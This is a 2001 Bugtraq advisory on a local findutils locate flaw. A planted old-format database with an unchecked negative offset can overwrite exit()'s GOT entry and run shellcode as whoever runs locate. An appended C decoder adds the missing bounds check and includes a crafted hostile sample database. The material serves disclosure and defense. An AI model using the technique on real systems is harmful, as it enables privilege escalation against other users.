Slackware 8.0, 7.1 Vulnerability: /usr/bin/locate
Date: Wed, 1 Aug 2001 12:03:58 -0400 (EDT)
From: Josh Smith <josh@viper.falcon-networks.com>
To: bugtraq@securityfocus.com
Subject: Slackware 8.0, 7.1 Vulnerability: /usr/bin/locate


Submitted by  : Josh (josh@viper.falcon-networks.com), lockdown
                (lockdown@lockeddown.net), zen-parse (zen-parse@gmx.net)
Vulnerability : /usr/bin/locate (findutils-4.1 and before)
Tested On     : Slackware 8.0, Slackware 7.1
Local         : Yes
Remote        : No
Fix           : Update to slocate
Target        : root or any other user that runs locate
Requires      : UID nobody
Greets to     : alpha, fr3n3tic, omega, eazyass, Remmy, RedPen, banned-it,
                slider, cryptix, s0ttle, xphantom, qtip, tirancy,
                Defiance, KraZee, synexic, Insane, rusko,
                falcon-networks.com, mp3.com/cosv.
Other Stuff   : We all (individually) need jobs.  E-mail the contact
                people with [WE HAVE A JOB FOR YOU] in the subject.

In Slackware, and possibly other distributions, it is possible to
modify the locate database if one were to obtain UID nobody.  This allows
locate to act as a sort of 'trojan', having anyone who executes it
unknowingly execute potentially malicious code.

It works by taking advantage of the fact that locate accepts old
format databases. LOCATEDB_OLD_ESCAPE (char 30) is followed by an offset,
stored in a signed integer, for how many characters to add to the current
character pointer in the path. It doesn't perform any sanity checking of
the input. This exploit tells it to move the pointer back a long way,
back past the beginning of the string, all the way to the GOT address for
exit(), which then gets the address of the shellcode added, and the
program then runs out of database and executes our code.

There is also probably a similar vulnerability in the new format.

P.S. dies: If you see this e-mail josh@viper.falcon-networks.com

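As an added illustration of the missing check (this is not the advisory's exploit and not findutils code), the decoder below reads old-format entries from a buffer and rejects any offset that would move the path pointer before the start of the current path. It assumes a simplified layout: a one-byte count biased by 14 (LOCATEDB_OLD_OFFSET in findutils), or LOCATEDB_OLD_ESCAPE (30) followed by a signed 16-bit little-endian delta, entries ended by a newline, no bigram table; the sample databases are constructed for the example.

```c
#include <stdint.h>
#include <string.h>

#define LOCATEDB_OLD_OFFSET 14   /* bias subtracted from a one-byte count */
#define LOCATEDB_OLD_ESCAPE 30   /* next two bytes hold a signed delta (assumed) */
#define PATH_MAX_LEN 256

/* Decode old-format entries from db[0..len): a shared-prefix count (biased byte,
 * or escape plus signed 16-bit delta), then the rest of the path up to '\n'.
 * Returns the number of paths, or -1 if a delta would leave the current path. */
int decode_old_locatedb(const unsigned char *db, size_t len,
                        char out[][PATH_MAX_LEN], int max_out)
{
    char path[PATH_MAX_LEN] = "";
    long count = 0;                          /* shared-prefix length */
    size_t i = 0; int n = 0;
    while (i < len && n < max_out) {
        long delta;
        if (db[i] == LOCATEDB_OLD_ESCAPE) {
            if (i + 3 > len) return -1;      /* truncated escape */
            delta = (int16_t)(db[i + 1] | (db[i + 2] << 8));
            i += 3;
        } else {
            delta = (long)db[i++] - LOCATEDB_OLD_OFFSET;
        }
        count += delta;
        /* The sanity check the advisory says is absent: stay inside the path. */
        if (count < 0 || count > (long)strlen(path)) return -1;
        char *p = path + count;
        while (i < len && db[i] != '\n') {
            if (p >= path + PATH_MAX_LEN - 1) return -1;        /* overlong path */
            *p++ = (char)db[i++];
        }
        *p = '\0';
        if (i < len) i++;                    /* consume the newline */
        strcpy(out[n++], path);
    }
    return n;
}

/* Constructed sample databases (not taken from the advisory). */
static const unsigned char GOOD_DB[] = {
    14, '/', 'u', 's', 'r', '\n',                                   /* "/usr" */
    15, 'b', 'i', 'n', '\n',                                        /* "/bin", shares "/" */
    14, 'u','s','r','/','b','i','n','/','l','o','c','a','t','e','\n' }; /* "/usr/bin/locate" */
static const unsigned char BAD_DB[] = { LOCATEDB_OLD_ESCAPE, 0x48, 0xF4, 'x', '\n' }; /* delta -3000 */
static char g_out[8][PATH_MAX_LEN];
int decode_good(void) { return decode_old_locatedb(GOOD_DB, sizeof GOOD_DB, g_out, 8); }
const char *good_path(int k) { return g_out[k]; }
int decode_bad(void)  { return decode_old_locatedb(BAD_DB, sizeof BAD_DB, g_out, 8); }
```

The same bounds test belongs before every pointer adjustment, whichever count encoding the real reader uses; a negative or over-long count is a corrupt or hostile database and should abort the read rather than be applied.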
